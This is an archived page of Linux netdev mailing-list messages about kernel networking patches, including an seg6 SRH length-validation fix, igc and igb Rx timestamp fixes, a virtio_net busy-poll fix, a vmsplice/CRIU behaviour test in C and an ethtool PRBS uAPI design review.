Netdev List

Netdev List
 help / color / mirror / Atom feed

* Re: [PATCH net] net: ethernet: qualcomm: ppe: Demote from supported and fix maintainer addresses
From: Jie Luo @ 2026-06-23  9:42 UTC (permalink / raw)
  To: Andrew Lunn, Krzysztof Kozlowski
  Cc: Bjorn Andersson, Michael Turquette, Stephen Boyd, Brian Masney,
	Rob Herring, Krzysztof Kozlowski, Conor Dooley, Andrew Lunn,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
	Lei Wei, Suruchi Agarwal, Pavithra R, linux-kernel, linux-arm-msm,
	linux-clk, devicetree, netdev
In-Reply-To: <0247dfba-1c14-4fea-aab3-5489a36f35f6@lunn.ch>



On 6/23/2026 4:10 PM, Andrew Lunn wrote:
>> Driver is not supported - in terms of how netdev understands supported
>> commitment - if maintainer does not care to receive the patches for its
>> code, so demote it to "maintained" to reflect true status.
> 
> Maybe "Orphan" would be better, if the listed Maintainer is not doing
> any Maintainer work?
> 
> 	   Andrew	   

Hello Andrew, Krzysztof,
I will continue to maintain the listed drivers, so their status can
remain Supported.

^ permalink raw reply

* Re: [PATCH 0/3] vmsplice: make vmsplice a trivial wrapper for preadv2/pwritev2
From: Askar Safin @ 2026-06-23  9:42 UTC (permalink / raw)
  To: avagin
  Cc: akpm, alexander, axboe, bernd, brauner, criu, david, dhowells,
	fuse-devel, hch, jack, joannelkoong, linux-api, linux-fsdevel,
	linux-kernel, linux-mm, miklos, netdev, patches, pfalcato,
	rostedt, safinaskar, torvalds, val, viro, willy
In-Reply-To: <CANaxB-xVCP5HSUNwphFrKPdW0Qh1pA33A6npac60WArkZMFt7w@mail.gmail.com>

Andrei Vagin <avagin@gmail.com>:
> Actually, this change introduces a performance and functional
> regression for CRIU.
> 
> Here is a brief overview of how CRIU currently dumps memory pages:
> 
> CRIU injects a parasite code blob into the target process's address
> space. The parasite invokes vmsplice() with the SPLICE_F_GIFT flag to
> pin physical pages directly inside a pipe without copying them. The main
> CRIU process then takes over from outside the target context, calling
> splice() on the other end of the pipe to stream the data directly into
> checkpoint image files or a remote network socket.
> 
> I ran a simple test that creates an anonymous mapping and touches every
> page within it:
> Without this patch, CRIU takes 9 seconds to dump the test process.
> With this patch, It takes 18 seconds...
> 
> Plus, it obviously introduces some memory overhead.
> 
> If these changes are merged, we will need to completely rework the
> memory dumping mechanism in CRIU. Using vmsplice() in this proposed form
> no longer makes any sense for our architecture...

I just have read some docs for CRIU. I found this statement:

> #### Why `splice` is Better:
> *   **Consistency via COW**: The `SPLICE_F_GIFT` flag ensures that if the process modifies a "gifted" page after resuming, the kernel performs a **Copy-on-Write (COW)**. The pipe buffer > continues to hold the *original* version of the page as it existed at the moment of the `vmsplice()` call, ensuring a perfectly consistent snapshot of that page.

This is wrong (with released kernels). I confirmed this by testing this on my current kernel (6.12.90).

See the code in the end of this message.

If you actually rely on mentioned consistency, then, it seems, CRIU is broken.

So, in fact, my patch actually brings consistency to CRIU. :)

-- 
Askar Safin




#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <errno.h>

int
main (void)
{
    int p[2];
    if (pipe (p) != 0)
        abort ();
    char buf[1] = {'a'};
    struct iovec iov[] = {
        {
            .iov_base = buf,
            .iov_len = 1,
        }
    };
    // I pass "SPLICE_F_NONBLOCK | SPLICE_F_GIFT" here, because this is what criu passes
    if (vmsplice (p[1], iov, 1, SPLICE_F_NONBLOCK | SPLICE_F_GIFT) != 1)
        abort ();
    if (close (p[1]) != 0)
        abort ();
    buf[0] = 'b';
    char buf2[1];
    if (read (p[0], buf2, 1) != 1)
        abort ();
    printf ("[%c]\n", buf2[0]); // Prints "b" as opposed to "a" on Linux 6.12.90
    return 0;
}

^ permalink raw reply

* Re: Ethtool : PRBS feature
From: Andrew Lunn @ 2026-06-23  9:43 UTC (permalink / raw)
  To: Das, Shubham
  Cc: Maxime Chevallier, Alexander H Duyck, lee@trager.us,
	netdev@vger.kernel.org, mkubecek@suse.cz, D H, Siddaraju,
	Chintalapalle, Balaji, Lindberg, Magnus,
	niklas.damberg@ericsson.com
In-Reply-To: <SN7PR11MB8109149608172808784CDCBEFFEF2@SN7PR11MB8109.namprd11.prod.outlook.com>

On Mon, Jun 22, 2026 at 03:38:30PM +0000, Das, Shubham wrote:
> Hi Maxime,
> 
> > Can you elaborate on what you have in mind for now ? what would the "ethtool --
> > phy-test" command look like in terms of its behaviour and parameters ?
> 
> We are trying to converge on a userspace uAPI for PRBS/BERT functionality that can work across
> different hardware models (PHY-managed, MAC/NIC-offloaded, or firmware-based implementations),
> without exposing those differences to userspace.
> 
> Based on the functionality we currently have, we proposed below commands in first email :
> 
> PRBS Transmitter/Checker Pattern Configuration:
> ethtool --phy-test eth1 tx-prbs prbs7
> ethtool --phy-test eth2 rx-prbs prbs7
> 
> BERT Test:
> ethtool --phy-test eth2 bert start
> ethtool --phy-test eth2 bert stop
> 
> BERT Test Counter Read/ PRBS Lock Status:
> ethtool --phy-test eth2 stats
> 
> BERT Clear stats - Symbol and Error counter:
> ethtool --phy-test eth2 clear-stats
> 
> TX Error Injection:
> ethtool --phy-test eth1 inject-error 1
> ethtool --phy-test eth1 inject-error 1e-3
> 
> Disable PRBS Pattern : TX/RX
> ethtool --phy-test eth1 tx-prbs off
> ethtool --phy-test eth2 rx-prbs off
> 
> Approach would be to add a generic ethtool netlink API for PHY/SerDes and allow drivers to implement the operations directly. 
> Conceptually:
>        ethtool ⇒ ethtool netlink ⇒ driver-specific implementation
> 
> We would appreciate your input on whether a command-based model is suitable for a uAPI, and how we should design
> it to accommodate different implementation models, such as PHY-based, phylib-based, and MAC/firmware-offloaded PRBS.

This is technical, not the uAPI. You need to define the netlink
messages and all the attributes that are passed between user space and
kernel. Please take a look at Documentation/netlink/specs and propose
an extension to ethtool.yaml.

Taking a quick look at this:

You are missing a way to enumerate what test patterns the hardware
supports. There is more than prbs7. You want to be able to report the
contents of C45 1.1500, and other similar registers.

To avoid race conditions, maybe some of these commands need combining. 
ethtool --phy-test eth1 tx-prbs prbs7 rx-prbs prbs7 bert start

The configuration is then atomic, with respect to the uAPI, so we
don't get two users configuring it at the same time, ending up with a
messed up configuration.

Traditionally, Unix does not offer a way to clear statistic counters
back to zero. So i'm not sure about clear-stats. We also need to think
about hardware which does not support that. And there is locking
issues, can the stats be cleared while a test is active? 

You need to think about the units for inject errors. There is no
floating point support. Also, is this corrupt packets? Or single bit
flips in the stream? It needs to be well defined what it actually
means. The driver can then convert it to whatever the hardware
supports. How does 802.3 specify this?

Also, 802.3 defines PRBS7 as a benign pattern. With a quick look, i
did not find a definition of benign, but injecting errors does not
seem benign to me.

I'm assuming when 'start' is used, the networking core will change the
interface status to IF_OPER_TESTING. It is not always obvious why an
interface is in testing mode, rather than IF_OPER_UP. Cable testing
could also be running, etc. So maybe there needs to be a way to report
why it is in IF_OPER_TESTING?

I also wounder if a timeout should be used with start, so that it will
return to IF_OPER_UP after a time period?

       Andrew

^ permalink raw reply

* RE: [Intel-wired-lan] [PATCH net] igc: Fix RX HW timestamp reporting when NET_RX_BUSY_POLL is disabled
From: Kwapulinski, Piotr @ 2026-06-23  9:46 UTC (permalink / raw)
  To: Ding Meng, Nguyen, Anthony L, Kitszel, Przemyslaw,
	andrew+netdev@lunn.ch, davem@davemloft.net, edumazet@google.com,
	kuba@kernel.org, pabeni@redhat.com, Kiszka, Jan, Bezdeka, Florian
  Cc: intel-wired-lan@lists.osuosl.org, linux-kernel@vger.kernel.org,
	netdev@vger.kernel.org, wq.wang@siemens.com
In-Reply-To: <20260622041718.6106-1-meng.ding@siemens.com>

>-----Original Message-----
>From: Intel-wired-lan <intel-wired-lan-bounces@osuosl.org> On Behalf Of Ding Meng via Intel-wired-lan
>Sent: Monday, June 22, 2026 6:13 AM
>To: Nguyen, Anthony L <anthony.l.nguyen@intel.com>; Kitszel, Przemyslaw <przemyslaw.kitszel@intel.com>; andrew+netdev@lunn.ch; davem@davemloft.net; edumazet@google.com; kuba@kernel.org; pabeni@redhat.com; Kiszka, Jan <jan.kiszka@siemens.com>; Bezdeka, Florian <florian.bezdeka@siemens.com>
>Cc: intel-wired-lan@lists.osuosl.org; linux-kernel@vger.kernel.org; netdev@vger.kernel.org; meng.ding@siemens.com; wq.wang@siemens.com
>Subject: [Intel-wired-lan] [PATCH net] igc: Fix RX HW timestamp reporting when NET_RX_BUSY_POLL is disabled
>
>When CONFIG_NET_RX_BUSY_POLL is deactivated, fetching RX HW timestamps from the NIC no longer works as expected.
>
>This occurs because disabling CONFIG_NET_RX_BUSY_POLL disables the SKB NAPI mapping in __skb_mark_napi_id(). Consequently, get_timestamp() fails to perform its driver lookup, and the igc driver's struct net_device_ops::ndo_get_tstamp is never invoked.
>
>Instead, get_timestamp() falls back to use shhwtstamps(skb)->hwtstamp, a field that the driver has not populated.
>
>Fix this by populating the hwtstamp field with the correct timestamp in the default timer when CONFIG_NET_RX_BUSY_POLL is disabled.
>
>Fixes: 069b142f5819 ("igc: Add support for PTP .getcyclesx64()")
>Co-developed-by: Florian Bezdeka <florian.bezdeka@siemens.com>
>Signed-off-by: Florian Bezdeka <florian.bezdeka@siemens.com>
>Signed-off-by: Ding Meng <meng.ding@siemens.com>
>---
> drivers/net/ethernet/intel/igc/igc_main.c | 38 ++++++++++++++++-------
> 1 file changed, 26 insertions(+), 12 deletions(-)
>
>diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
>index 8ac16808023..1da8d7aa76d 100644
>--- a/drivers/net/ethernet/intel/igc/igc_main.c
>+++ b/drivers/net/ethernet/intel/igc/igc_main.c
>@@ -1992,7 +1992,26 @@ static struct sk_buff *igc_build_skb(struct igc_ring *rx_ring,
> 	return skb;
> }
> 
>-static struct sk_buff *igc_construct_skb(struct igc_ring *rx_ring,
>+static void igc_construct_skb_timestamps(struct igc_adapter *adapter,
>+					 struct sk_buff *skb,
>+					 struct igc_xdp_buff *ctx)
>+{
>+	if (!ctx->rx_ts)
>+		return;
>+#ifdef CONFIG_NET_RX_BUSY_POLL
>+	skb_shinfo(skb)->tx_flags |= SKBTX_HW_TSTAMP_NETDEV;
>+	skb_hwtstamps(skb)->netdev_data = ctx->rx_ts; #else
>+	struct igc_inline_rx_tstamps *tstamps;
Please move at the top of the function and add:
Reviewed-by: Piotr Kwapulinski <piotr.kwapulinski@intel.com

>+
>+	tstamps = ctx->rx_ts;
>+	skb_hwtstamps(skb)->hwtstamp = igc_ptp_rx_pktstamp(adapter,
>+							   tstamps->timer0);
>+#endif
>+}
>+
>+static struct sk_buff *igc_construct_skb(struct igc_adapter *adapter,
>+					 struct igc_ring *rx_ring,
> 					 struct igc_rx_buffer *rx_buffer,
> 					 struct igc_xdp_buff *ctx)
> {
>@@ -2013,10 +2032,7 @@ static struct sk_buff *igc_construct_skb(struct igc_ring *rx_ring,
> 	if (unlikely(!skb))
> 		return NULL;
> 
>-	if (ctx->rx_ts) {
>-		skb_shinfo(skb)->tx_flags |= SKBTX_HW_TSTAMP_NETDEV;
>-		skb_hwtstamps(skb)->netdev_data = ctx->rx_ts;
>-	}
>+	igc_construct_skb_timestamps(adapter, skb, ctx);
> 
> 	/* Determine available headroom for copy */
> 	headlen = size;
>@@ -2686,7 +2702,7 @@ static int igc_clean_rx_irq(struct igc_q_vector *q_vector, const int budget)
> 		else if (ring_uses_build_skb(rx_ring))
> 			skb = igc_build_skb(rx_ring, rx_buffer, &ctx.xdp);
> 		else
>-			skb = igc_construct_skb(rx_ring, rx_buffer, &ctx);
>+			skb = igc_construct_skb(adapter, rx_ring, rx_buffer, &ctx);
> 
> 		/* exit if we failed to retrieve a buffer */
> 		if (!xdp_res && !skb) {
>@@ -2738,7 +2754,8 @@ static int igc_clean_rx_irq(struct igc_q_vector *q_vector, const int budget)
> 	return total_packets;
> }
> 
>-static struct sk_buff *igc_construct_skb_zc(struct igc_ring *ring,
>+static struct sk_buff *igc_construct_skb_zc(struct igc_adapter *adapter,
>+					    struct igc_ring *ring,
> 					    struct igc_xdp_buff *ctx)
> {
> 	struct xdp_buff *xdp = &ctx->xdp;
>@@ -2760,10 +2777,7 @@ static struct sk_buff *igc_construct_skb_zc(struct igc_ring *ring,
> 		__skb_pull(skb, metasize);
> 	}
> 
>-	if (ctx->rx_ts) {
>-		skb_shinfo(skb)->tx_flags |= SKBTX_HW_TSTAMP_NETDEV;
>-		skb_hwtstamps(skb)->netdev_data = ctx->rx_ts;
>-	}
>+	igc_construct_skb_timestamps(adapter, skb, ctx);
> 
> 	return skb;
> }
>@@ -2775,7 +2789,7 @@ static void igc_dispatch_skb_zc(struct igc_q_vector *q_vector,
> 	struct igc_ring *ring = q_vector->rx.ring;
> 	struct sk_buff *skb;
> 
>-	skb = igc_construct_skb_zc(ring, ctx);
>+	skb = igc_construct_skb_zc(q_vector->adapter, ring, ctx);
> 	if (!skb) {
> 		ring->rx_stats.alloc_failed++;
> 		set_bit(IGC_RING_FLAG_RX_ALLOC_FAILED, &ring->flags);
>
>base-commit: 4549871118cf616eecdd2d939f78e3b9e1dddc48
>--
>2.47.3
>
>

^ permalink raw reply

* Re: Re: [PATCH net] seg6: validate SRH length before reading fixed fields
From: Nuoqi Gui @ 2026-06-23  9:52 UTC (permalink / raw)
  To: Andrea Mayer
  Cc: David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
	Simon Horman, netdev, bpf, linux-kernel, stefano.salsano
In-Reply-To: <20260622213317.52c8b5a38b88d4ccc3849e22@uniroma2.it>




> -----Original Messages-----
> From: "Andrea Mayer" <andrea.mayer@uniroma2.it>
> Send time:Tuesday, 23/06/2026 03:33:17
> To: "Nuoqi Gui" <gnq25@mails.tsinghua.edu.cn>
> Cc: "David S. Miller" <davem@davemloft.net>, "Eric Dumazet" <edumazet@google.com>, "Jakub Kicinski" <kuba@kernel.org>, "Paolo Abeni" <pabeni@redhat.com>, "Simon Horman" <horms@kernel.org>, netdev@vger.kernel.org, bpf@vger.kernel.org, linux-kernel@vger.kernel.org, stefano.salsano@uniroma2.it, "Andrea Mayer" <andrea.mayer@uniroma2.it>
> Subject: Re: [PATCH net] seg6: validate SRH length before reading fixed fields
> 
> On Sat, 20 Jun 2026 23:55:51 +0800
> Nuoqi Gui <gnq25@mails.tsinghua.edu.cn> wrote:
> 
> Hi Nuoqi,
> Thanks for the patch.
> 
> > seg6_validate_srh() reads fixed SRH fields such as srh->type and
> > srh->hdrlen before checking that the supplied length covers the fixed
> > struct ipv6_sr_hdr fields.  Callers that pass a length smaller than
> > sizeof(struct ipv6_sr_hdr) therefore expose those reads to memory
> > outside the validated range.
> >
> > The BPF SEG6 encap path (bpf_lwt_push_encap() -> bpf_push_seg6_encap())
> > is one such caller: it forwards a BPF program-supplied pointer and
> > length straight to seg6_validate_srh() with no minimum-size guard, so a
> > 2-byte SEG6 encap header lets the validator read srh->type at offset 2
> > beyond the caller-supplied buffer.
> 
> Besides the BPF use case, is there a caller that can reach it with
> len < sizeof(*srh)? The ones I found all pass at least the fixed header.
> 
No, I don't see another current caller that can reach seg6_validate_srh() 
with len < sizeof(*srh). I'll narrow the commit message accordingly.

> >
> > Reject lengths shorter than the fixed SRH at the top of
> > seg6_validate_srh(), before any field is read.  This fixes the BPF helper
> > path and hardens the common validator for any other caller that reaches it
> > with a too-short SRH.
> >
> > Fixes: fe94cc290f53 ("bpf: Add IPv6 Segment Routing helpers")
> > Signed-off-by: Nuoqi Gui <gnq25@mails.tsinghua.edu.cn>
> > ---
> >  net/ipv6/seg6.c | 3 +++
> >  1 file changed, 3 insertions(+)
> >
> > diff --git a/net/ipv6/seg6.c b/net/ipv6/seg6.c
> > index 1c3ad25700c4c..d2cb32a1058af 100644
> > --- a/net/ipv6/seg6.c
> > +++ b/net/ipv6/seg6.c
> > @@ -29,6 +29,9 @@ bool seg6_validate_srh(struct ipv6_sr_hdr *srh, int len, bool reduced)
> >       int max_last_entry;
> >       int trailing;
> >
> > +     if (len < (int)sizeof(*srh))
> > +             return false;
> > +
> 
> The (int) cast only changes the result when len < 0, which is not a meaningful
> byte length. Plain "len < sizeof(*srh)" would be enough.
> 
I'll use plain len < sizeof(*srh).

> >       if (srh->type != IPV6_SRCRT_TYPE_4)
> >               return false;
> >
> >
> > ---
> > base-commit: 96e7f9122aae0ed000ee321f324b812a447906d9
> > change-id: 20260619-f01-17-seg6-srh-len-a85f35427e0b
> >
> > Best regards,
> > --
> > Nuoqi Gui <gnq25@mails.tsinghua.edu.cn>
> >
> 
> Regards,
> Andrea

^ permalink raw reply

* Re: [PATCH v2] virtio_net: disable cb when NAPI is busy-polled
From: Eric Dumazet @ 2026-06-23  9:55 UTC (permalink / raw)
  To: Longjun Tang, netdev; +Cc: mst, xuanzhuo, jasowang, virtualization, tanglongjun
In-Reply-To: <20260623091901.118315-1-lange_tang@163.com>

On Tue, Jun 23, 2026 at 2:19 AM Longjun Tang <lange_tang@163.com> wrote:
>
> From: Longjun Tang <tanglongjun@kylinos.cn>
>
> When busy-poll is active, napi_schedule_prep() returns false in
> virtqueue_napi_schedule(), so virtqueue_disable_cb() is skipped.
> The device may keep firing irqs until reaches virtqueue_napi_complete().
> Under load (received == budget), it will lead to a large number
> of spurious interrupts.
>
> Fix it by disabling the callback at the virtnet_poll() entry. This keeps
> the callback off while we poll and re-enable by virtqueue_napi_complete()
> when going idle.
>
> Signed-off-by: Longjun Tang <tanglongjun@kylinos.cn>
>

I added netdev@ to get more attention from networking napi polling experts,

Please add a Fixes: tag as this will ease code review.

My rough guess is:

Fixes: ceef438d613f ("virtio_net: remove custom busy_poll")

Thanks.

> ---
> V1 -> V2: Remain agnostic to busy polling
> ---
>  drivers/net/virtio_net.c | 5 +++++
>  1 file changed, 5 insertions(+)
>
> diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> index f4adcfee7a80..0a11f2b32500 100644
> --- a/drivers/net/virtio_net.c
> +++ b/drivers/net/virtio_net.c
> @@ -3008,6 +3008,11 @@ static int virtnet_poll(struct napi_struct *napi, int budget)
>         unsigned int xdp_xmit = 0;
>         bool napi_complete;
>
> +       /* Keep callbacks suppressed for the duration of this poll,
> +        * busy-poll need.
> +        */
> +       virtqueue_disable_cb(rq->vq);
> +
>         virtnet_poll_cleantx(rq, budget);
>
>         received = virtnet_receive(rq, budget, &xdp_xmit);
> --
> 2.43.0
>

^ permalink raw reply

* Re: [PATCH net] net: ethernet: qualcomm: ppe: Demote from supported and fix maintainer addresses
From: Krzysztof Kozlowski @ 2026-06-23  9:55 UTC (permalink / raw)
  To: Jie Luo, Andrew Lunn
  Cc: Bjorn Andersson, Michael Turquette, Stephen Boyd, Brian Masney,
	Rob Herring, Krzysztof Kozlowski, Conor Dooley, Andrew Lunn,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
	Lei Wei, Suruchi Agarwal, Pavithra R, linux-kernel, linux-arm-msm,
	linux-clk, devicetree, netdev
In-Reply-To: <8b0560ae-af5c-4d54-be02-d186be1d799c@oss.qualcomm.com>

On 23/06/2026 11:42, Jie Luo wrote:
> 
> 
> On 6/23/2026 4:10 PM, Andrew Lunn wrote:
>>> Driver is not supported - in terms of how netdev understands supported
>>> commitment - if maintainer does not care to receive the patches for its
>>> code, so demote it to "maintained" to reflect true status.
>>
>> Maybe "Orphan" would be better, if the listed Maintainer is not doing
>> any Maintainer work?
>>
>> 	   Andrew	   
> 
> Hello Andrew, Krzysztof,
> I will continue to maintain the listed drivers, so their status can
> remain Supported.

Do you understand the commitment/meaning of supported in networking
subsystem? Do you commit to the time frames netdev is asking, including
running the tests and reporting results TWICE per day (minimum frequency
is ever 12 hours)?

If address did not work for half a year, I really doubt that you commit
to above.

Best regards,
Krzysztof

^ permalink raw reply

* RE: [Intel-wired-lan] [PATCH net v2] igb: only strip Rx timestamp header on the first buffer of a frame
From: Kwapulinski, Piotr @ 2026-06-23 10:06 UTC (permalink / raw)
  To: tkusters@aweta.nl, Nguyen, Anthony L, Kitszel, Przemyslaw,
	Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Richard Cochran, Jesper Dangaard Brouer,
	Kurt Kanzenbach
  Cc: intel-wired-lan@lists.osuosl.org, netdev@vger.kernel.org,
	linux-kernel@vger.kernel.org, stable@vger.kernel.org
In-Reply-To: <20260619-igb-rx-ts-fix-v2-1-d3b8d605ca62@aweta.nl>

>-----Original Message-----
>From: Intel-wired-lan <intel-wired-lan-bounces@osuosl.org> On Behalf Of Tjerk Kusters via B4 Relay
>Sent: Friday, June 19, 2026 9:15 AM
>To: Nguyen, Anthony L <anthony.l.nguyen@intel.com>; Kitszel, Przemyslaw <przemyslaw.kitszel@intel.com>; Andrew Lunn <andrew+netdev@lunn.ch>; David S. Miller <davem@davemloft.net>; Eric Dumazet <edumazet@google.com>; Jakub Kicinski <kuba@kernel.org>; Paolo Abeni <pabeni@redhat.com>; Richard Cochran <richardcochran@gmail.com>; Jesper Dangaard Brouer <hawk@kernel.org>; Kurt Kanzenbach <kurt@linutronix.de>
>Cc: intel-wired-lan@lists.osuosl.org; netdev@vger.kernel.org; linux-kernel@vger.kernel.org; stable@vger.kernel.org; Tjerk Kusters <tkusters@aweta.nl>
>Subject: [Intel-wired-lan] [PATCH net v2] igb: only strip Rx timestamp header on the first buffer of a frame
>
>From: Tjerk Kusters <tkusters@aweta.nl>
>
>When Rx hardware timestamping is enabled (e.g. ptp4l, which configures HWTSTAMP_FILTER_ALL), the NIC prepends a 16-byte timestamp header to the first Rx buffer of every received frame. igb_clean_rx_irq() strips this header inside its per-buffer loop:
>
>	if (igb_test_staterr(rx_desc, E1000_RXDADV_STAT_TSIP)) {
>		ts_hdr_len = igb_ptp_rx_pktstamp(rx_ring->q_vector,
>						 pktbuf, &timestamp);
>		pkt_offset += ts_hdr_len;
>		size -= ts_hdr_len;
>	}
>
>For a frame that spans more than one Rx buffer (e.g. a jumbo frame), this block runs once per buffer. The timestamp header only exists at the start of the first buffer, but igb_ptp_rx_pktstamp() is called for every buffer.
>
>On a continuation buffer the data is packet payload, not a timestamp header. igb_ptp_rx_pktstamp() already has two guards against acting on a non-header buffer: it returns 0 if PTP is disabled, and returns 0 if the reserved dwords (the first 8 bytes) are non-zero. Neither is sufficient
>here: PTP is enabled, and a continuation buffer whose payload happens to begin with 8 zero bytes passes the reserved-dword check. In that case the payload is mistaken for a valid timestamp header and igb_ptp_rx_pktstamp() returns IGB_TS_HDR_LEN, so the caller strips 16 bytes of real data from that buffer. A frame spanning N buffers whose continuation buffers start with zero bytes therefore loses 16 * (N - 1) bytes from its tail.
>
>This is easily triggered by a GigE Vision camera streaming dark frames (mostly 0x00 pixel data) over jumbo UDP with PTP active on the receiver:
>the all-zero frames arrive truncated while frames with non-zero content are fine. There is no error indication.
>
>No content-based check can reliably tell a continuation buffer that begins with zero bytes from a real timestamp header, because both are all zero.
>Fix it structurally instead: only attempt the strip on the first buffer of a frame, which is the only buffer that can contain a timestamp header. In
>igb_clean_rx_irq() skb is NULL until the first buffer has been processed, so guarding the strip with !skb restricts it to the first buffer regardless of payload content.
>
>Fixes: 5379260852b0 ("igb: Fix XDP with PTP enabled")
>Cc: stable@vger.kernel.org
>Reviewed-by: Kurt Kanzenbach <kurt@linutronix.de>
>Signed-off-by: Tjerk Kusters <tkusters@aweta.nl>
>---
>Changes in v2:
> - resend via b4 (v1 was sent with a mail client)
> - use full author name "Tjerk Kusters" (Jacob Keller)
> - add Reviewed-by from Kurt Kanzenbach
> - no functional change
>
>Link to v1: https://lore.kernel.org/all/PAWPR05MB1069106D52F4E17F1EDB99C67B9182@PAWPR05MB10691.eurprd05.prod.outlook.com/
>---
> drivers/net/ethernet/intel/igb/igb_main.c | 3 ++-
> 1 file changed, 2 insertions(+), 1 deletion(-)
>
>diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
>index ce91dda00ec0..abb55cd589a9 100644
>--- a/drivers/net/ethernet/intel/igb/igb_main.c
>+++ b/drivers/net/ethernet/intel/igb/igb_main.c
>@@ -9061,7 +9061,8 @@ static int igb_clean_rx_irq(struct igb_q_vector *q_vector, const int budget)
> 		pktbuf = page_address(rx_buffer->page) + rx_buffer->page_offset;
> 
> 		/* pull rx packet timestamp if available and valid */
Is this comment up-to-date now ?
Reviewed-by: Piotr Kwapulinski <piotr.kwapulinski@intel.com>

>-		if (igb_test_staterr(rx_desc, E1000_RXDADV_STAT_TSIP)) {
>+		if (!skb &&
>+		    igb_test_staterr(rx_desc, E1000_RXDADV_STAT_TSIP)) {
> 			int ts_hdr_len;
> 
> 			ts_hdr_len = igb_ptp_rx_pktstamp(rx_ring->q_vector,
>
>---
>base-commit: 2d3090a8aeb596a26935db0955d46c9a5db5c6ce
>change-id: 20260619-igb-rx-ts-fix-cd70585ee316
>
>Best regards,
>--
>Tjerk Kusters <tkusters@aweta.nl>
>
>

^ permalink raw reply

* Re: [PATCH net] net, bpf: check master for NULL in xdp_master_redirect()
From: Jiayuan Chen @ 2026-06-23 10:08 UTC (permalink / raw)
  To: Ido Schimmel, Xiang Mei
  Cc: Jakub Kicinski, Daniel Borkmann, Martin KaFai Lau,
	Jesper Dangaard Brouer, netdev, bpf, John Fastabend,
	Stanislav Fomichev, Alexei Starovoitov, Jussi Maki, Paolo Abeni,
	Weiming Shi, Ido Schimmel, David Ahern
In-Reply-To: <20260623065218.GA378121@shredder>


On 6/23/26 2:52 PM, Ido Schimmel wrote:
> On Mon, Jun 22, 2026 at 04:34:06PM -0700, Xiang Mei wrote:
>> On Mon, Jun 22, 2026 at 3:58 PM Jakub Kicinski <kuba@kernel.org> wrote:
>>> Can you double-confirm that this triggers on current HEAD
>>> of linux/master ? I thought commit 2674d603a9e6 ("vrf: Fix a potential
>>> NPD when removing a port from a VRF") was supposed to prevent all the
>>> torn master fetches. Adding VRF folks to CC.
>> Yes.
>>
>> We have triggered the crash on 56abdaebbf0da304b860bed1f2b5a85f5a6a16a0,
>> which is the latest for net.git, and 2674d603a9e6 was applied. We can
>> still trigger the crash:
> 2674d603a9e6 was only for VRF ports, so it doesn't help with this case
> (bond port). Also, the problem that 2674d603a9e6 fixed is a bit
> different. We had a NULL check after netdev_master_upper_dev_get_rcu(),
> but the issue was that this master device was not necessarily a VRF
> master.
Agree, it seems that 2674d603a9e6 only focus on VRF side.

>
> Looking at __bond_release_one(), assuming that
> netdev_master_upper_dev_get_rcu() returned a master device, I believe it
> must be a bond because you have a synchronize_rcu() after
> bond_upper_dev_unlink().
Right, synchronize_rcu() only guarantees that the master device is not freed
while our RCU reader is operating on it, but it does not guarantee that
we can successfully acquire the master device. We still need NULL check 
here.

^ permalink raw reply

* [PATCH v4 0/5] Introduce error threshold to drm_ras
From: Raag Jadav @ 2026-06-23 10:09 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: simona.vetter, airlied, kuba, lijo.lazar, Hawking.Zhang, davem,
	pabeni, edumazet, dev, zachary.mckevitt, rodrigo.vivi,
	riana.tauro, michal.wajdeczko, matthew.d.roper, mallesh.koujalagi,
	Raag Jadav

This series introduces error threshold to drm_ras infrastructure. This
allows user to get and set the error threshold of a specific counter.

Detailed description in commit message and documentation.

v2: Document threshold definition (Riana)
    Return -EOPNOTSUPP on threshold callbacks absence (Riana)
    Cancel and free genlmsg on failure (Riana)
    Document threshold bounds checking responsibility (Riana)
    Add RAS operation status codes (Riana)
    Use goto (Riana)

v3: Move documentation from yaml to rst file (Riana)
    s/value/threshold (Riana)
    Use goto for error handling (Riana)
    Reuse status codes and uapi mapping from counter series (Riana)
    Access request/response counter using local pointer (Riana)
    Mark unused field as reserved (Riana)
    Return -ENOENT on info absence (Riana)

v4: Clarify 0 threshold expectations (Riana)
    Drop redundant wrapping (Riana)
    Make debug logs consistent (Riana)
    Update kdoc (Riana)

Raag Jadav (5):
  drm/ras: Cancel and free message on get counter failure
  drm/ras: Introduce error threshold
  drm/xe/ras: Add support for error threshold
  drm/xe/drm_ras: Wire up error threshold callbacks
  drm/xe/sysctrl: Reuse xe_sysctrl_create_command()

 Documentation/gpu/drm-ras.rst                 |  18 ++
 Documentation/netlink/specs/drm_ras.yaml      |  32 ++++
 drivers/gpu/drm/drm_ras.c                     | 178 +++++++++++++++++-
 drivers/gpu/drm/drm_ras_nl.c                  |  27 +++
 drivers/gpu/drm/drm_ras_nl.h                  |   4 +
 drivers/gpu/drm/xe/xe_drm_ras.c               |  34 ++++
 drivers/gpu/drm/xe/xe_ras.c                   | 105 +++++++++++
 drivers/gpu/drm/xe/xe_ras.h                   |   2 +
 drivers/gpu/drm/xe/xe_ras_types.h             |  51 +++++
 drivers/gpu/drm/xe/xe_sysctrl_event.c         |  28 +--
 drivers/gpu/drm/xe/xe_sysctrl_mailbox_types.h |   4 +
 include/drm/drm_ras.h                         |  28 +++
 include/uapi/drm/drm_ras.h                    |   3 +
 13 files changed, 487 insertions(+), 27 deletions(-)

-- 
2.43.0


^ permalink raw reply

* [PATCH v4 1/5] drm/ras: Cancel and free message on get counter failure
From: Raag Jadav @ 2026-06-23 10:09 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: simona.vetter, airlied, kuba, lijo.lazar, Hawking.Zhang, davem,
	pabeni, edumazet, dev, zachary.mckevitt, rodrigo.vivi,
	riana.tauro, michal.wajdeczko, matthew.d.roper, mallesh.koujalagi,
	Raag Jadav
In-Reply-To: <20260623101043.255897-1-raag.jadav@intel.com>

doit_reply_value() directly returns on get counter failure, which results
in stale sk_buff and genetlink header that aren't cleaned up. Fix it and
